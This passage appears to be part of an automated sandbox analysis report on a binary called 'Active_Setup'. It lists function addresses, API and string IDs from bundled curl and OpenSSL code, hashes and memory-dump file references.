                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                                  • String ID: %04d-%02d-%02d %02d:%02d:%02d %s$GMT
                                                                                                                                                  • API String ID: 1809024409-2925788504
                                                                                                                                                  • Opcode ID: 11a39e6d002e4dfc330a81d998546778d8919f87915d4b9c50910b366f8c9a8c
                                                                                                                                                  • Instruction ID: f233b6e7e451470620ffc2f65c0398a7128db5b990ef3ffe55fb59462a23620e
                                                                                                                                                  • Opcode Fuzzy Hash: 11a39e6d002e4dfc330a81d998546778d8919f87915d4b9c50910b366f8c9a8c
                                                                                                                                                  • Instruction Fuzzy Hash: 093148711085864FC725DB00D8F5FB7BBE5FB92309F8A80CCD0998F462E3699A5ADB50
                                                                                                                                                  Function 00FD0DF0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __wcstoui64
                                                                                                                                                  • String ID: $%
                                                                                                                                                  • API String ID: 3882282163-2111875603
                                                                                                                                                  • Opcode ID: 7c7c19cf99a09d82dfc6d814b6884f78d246d89f212c132a0f4195927562b4a5
                                                                                                                                                  • Instruction ID: 2e58fd2f3b8d89a740828b7331762864d7c082b5d6a421d51ac90537f2bb28df
                                                                                                                                                  • Opcode Fuzzy Hash: 7c7c19cf99a09d82dfc6d814b6884f78d246d89f212c132a0f4195927562b4a5
                                                                                                                                                  • Instruction Fuzzy Hash: E9310972E083419FD7209B39AC487AB7BD69F95324F0C4C6EE8C587341DA35D609D752
                                                                                                                                                  Function 0109D177 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __stat64i32
                                                                                                                                                  • String ID: %s%c%08lx.%s%d$.\crypto\x509\by_dir.c
                                                                                                                                                  • API String ID: 3188378616-2081607520
                                                                                                                                                  • Opcode ID: d665057e11f470cdb862c67859b0c0ad767b6827a8ca5f32edf72cbde53fd838
                                                                                                                                                  • Instruction ID: d8870189e0ee7d7f0f4a03bba69950506bfab383e569c458477c737b98b283f7
                                                                                                                                                  • Opcode Fuzzy Hash: d665057e11f470cdb862c67859b0c0ad767b6827a8ca5f32edf72cbde53fd838
                                                                                                                                                  • Instruction Fuzzy Hash: 2931F4B5644301ABEB20DF94CD92F6B73E9EF94710F048958F9C98B341DA35E900DBA1
                                                                                                                                                  Function 0109D175 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __stat64i32
                                                                                                                                                  • String ID: %s%c%08lx.%s%d$.\crypto\x509\by_dir.c
                                                                                                                                                  • API String ID: 3188378616-2081607520
                                                                                                                                                  • Opcode ID: 2745b7cfafdc7e707ba4ee76c2f3e93479873a193616dcfa949335e25daf0363
                                                                                                                                                  • Instruction ID: 64ef946c428528760392d1dd14e28174e0fb19671618c5c31044ab7a195c237d
                                                                                                                                                  • Opcode Fuzzy Hash: 2745b7cfafdc7e707ba4ee76c2f3e93479873a193616dcfa949335e25daf0363
                                                                                                                                                  • Instruction Fuzzy Hash: 5D31E5B5644301ABEB10DF94CD92F6B73E9EF94710F048958F9C98B341D635E900DBA1
                                                                                                                                                  Function 01029560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __wcstoui64.LIBCMT ref: 0102957C
                                                                                                                                                    • Part of subcall function 01081D7E: strtoxl.LIBCMT ref: 01081DA0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __wcstoui64strtoxl
                                                                                                                                                  • String ID: .\crypto\asn1\asn1_gen.c$Char=
                                                                                                                                                  • API String ID: 2058942787-708889550
                                                                                                                                                  • Opcode ID: f4e94639a99cf684bd401e52d110bc4439260105670a1a1372c32d4d3e84f241
                                                                                                                                                  • Instruction ID: e2a92e1a9236b34ba99eb765b08a1e806fa45c0639af388e1c5df291ed10df77
                                                                                                                                                  • Opcode Fuzzy Hash: f4e94639a99cf684bd401e52d110bc4439260105670a1a1372c32d4d3e84f241
                                                                                                                                                  • Instruction Fuzzy Hash: 0521D6317053315BF720AA1CAC52BDB77C49F81B19F8804AAF9C49A2C1D6AA8509C793
                                                                                                                                                  Function 00FEEC00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset
                                                                                                                                                  • String ID: .\crypto\buffer\buffer.c
                                                                                                                                                  • API String ID: 2102423945-294840303
                                                                                                                                                  • Opcode ID: 48c07e99490eeb5eb0d51b9c59adf7ef79cc8be0d17e3ed21665294b1a2d35ca
                                                                                                                                                  • Instruction ID: 1509bdc71e072d8b8ac7d0e60461a81354ea9b0c243b8554b534f2db2776fa76
                                                                                                                                                  • Opcode Fuzzy Hash: 48c07e99490eeb5eb0d51b9c59adf7ef79cc8be0d17e3ed21665294b1a2d35ca
                                                                                                                                                  • Instruction Fuzzy Hash: 6F21FC75BC430167D6105A2EFC83B5673D59BD4B20F18883DF64DE73C5E5B4A846D160
                                                                                                                                                  Function 0101C1F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .\crypto\evp\evp_enc.c$b <= sizeof ctx->buf
                                                                                                                                                  • API String ID: 0-417187130
                                                                                                                                                  • Opcode ID: b6b882c27e8a94e2e56da83f1e55652772b46e160a88466a6676a83db9a33c80
                                                                                                                                                  • Instruction ID: 564debe9e0b9a589d16ed367b0a752aba3c1a993e1afc214a2e40a2250f27e18
                                                                                                                                                  • Opcode Fuzzy Hash: b6b882c27e8a94e2e56da83f1e55652772b46e160a88466a6676a83db9a33c80
                                                                                                                                                  • Instruction Fuzzy Hash: 0E21DE723843005BE764DF5CED41BEA73D5AFC4B10F04049DF9899B684D3B8E8428AA1
                                                                                                                                                  Function 01052570 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .\crypto\dso\dso_win32.c$symname(
                                                                                                                                                  • API String ID: 0-1441745606
                                                                                                                                                  • Opcode ID: 10130ddcec8a2b51edf06768739a9c23d81486844d7a534927cd96815eb0d6f4
                                                                                                                                                  • Instruction ID: f210b9269e85b58cb69fd0f40522b24abb444699f49836f970890eca048fdd53
                                                                                                                                                  • Opcode Fuzzy Hash: 10130ddcec8a2b51edf06768739a9c23d81486844d7a534927cd96815eb0d6f4
                                                                                                                                                  • Instruction Fuzzy Hash: ED11C8FAF8470176F260B6797C03F4732895B84F90F0D4469FB4AEE2C6E4A6E50151A5
                                                                                                                                                  Function 01052490 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .\crypto\dso\dso_win32.c$symname(
                                                                                                                                                  • API String ID: 0-1441745606
                                                                                                                                                  • Opcode ID: af046cb5d71181a0edfd095107e810955fd106932c465d2ae44b67e1dd638a93
                                                                                                                                                  • Instruction ID: 8f359de888f360e5621287eb372317adcfc42ee7cfcc8a9d767dd6c121277472
                                                                                                                                                  • Opcode Fuzzy Hash: af046cb5d71181a0edfd095107e810955fd106932c465d2ae44b67e1dd638a93
                                                                                                                                                  • Instruction Fuzzy Hash: E51108B6BC430176F660B6797C03F5B328A5B84F44F0D0469FB89EE2C2E8B6E4419195
                                                                                                                                                  Function 00FCA400 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP ref: 00FCA436
                                                                                                                                                    • Part of subcall function 00FC4DC0: curl_mvsnprintf.ACTIVE_SETUP(00000000,00000000,?,?,00FC108A,?,000000A0,[%s %s %s],Header,from,?,?,?,00000000,00000000), ref: 00FC4DD4
                                                                                                                                                  • SetLastError.KERNEL32(0000001C), ref: 00FCA47D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastcurl_msnprintfcurl_mvsnprintf
                                                                                                                                                  • String ID: %d.%d.%d.%d
                                                                                                                                                  • API String ID: 1074227547-3491811756
                                                                                                                                                  • Opcode ID: d3f9ee5be147f97d2c4d84892081b12379020af85ab9c3d93cfba315db9b7a32
                                                                                                                                                  • Instruction ID: 209cce1da417d6df9bff61c5f44445bf77fdb28c85c6512ca485b72b718e5963
                                                                                                                                                  • Opcode Fuzzy Hash: d3f9ee5be147f97d2c4d84892081b12379020af85ab9c3d93cfba315db9b7a32
                                                                                                                                                  • Instruction Fuzzy Hash: 761106705082864FC709DF28842AF677BE15F99700F84889DF0D287262E665D50897A3
                                                                                                                                                  Function 01058CB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __time64_memset
                                                                                                                                                  • String ID: .\ssl\ssl_sess.c
                                                                                                                                                  • API String ID: 2750760331-1959455021
                                                                                                                                                  • Opcode ID: cab85e717024e23b6d95548f97856390fbae00b927267779df64445de209a716
                                                                                                                                                  • Instruction ID: 39fcf0d1b59e7e5ae8fce2c61aeddefbdb5a83e89f07965b2fde135e502994bc
                                                                                                                                                  • Opcode Fuzzy Hash: cab85e717024e23b6d95548f97856390fbae00b927267779df64445de209a716
                                                                                                                                                  • Instruction Fuzzy Hash: E21130B1A417019EE330AF7A9C01FC7FAE9AF90740F04451FE6EE9B291D7B020409BA1
                                                                                                                                                  Function 00FC1180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_mvsnprintf.ACTIVE_SETUP(00FB8A4C,00004000,tP8g,tP8g,tP8g,00000000,00FC9C63,tP8g,Callback aborted), ref: 00FC119C
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(8904C483,00000100,0109FC00,00FB8A4C), ref: 00FC11C3
                                                                                                                                                    • Part of subcall function 00FC4DC0: curl_mvsnprintf.ACTIVE_SETUP(00000000,00000000,?,?,00FC108A,?,000000A0,[%s %s %s],Header,from,?,?,?,00000000,00000000), ref: 00FC4DD4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_mvsnprintf$curl_msnprintf
                                                                                                                                                  • String ID: tP8g
                                                                                                                                                  • API String ID: 2260702874-846472870
                                                                                                                                                  • Opcode ID: 8b39f5f4446a376df44801ae7b47374d878ded9be94f02bd814c4ba118bd63c6
                                                                                                                                                  • Instruction ID: b1bdbac22a89f933a5f20f3a98233e50321e0b2968cfa1c5bd0cd30bb5364b58
                                                                                                                                                  • Opcode Fuzzy Hash: 8b39f5f4446a376df44801ae7b47374d878ded9be94f02bd814c4ba118bd63c6
                                                                                                                                                  • Instruction Fuzzy Hash: 90016871900702AED32296289D06FE337E8BB86314F18485CF99A8B043D674A544CF51
                                                                                                                                                  Function 00FC1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • send.WS2_32(?,?,?,00000000), ref: 00FC123F
                                                                                                                                                  • WSAGetLastError.WS2_32(?), ref: 00FC1257
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
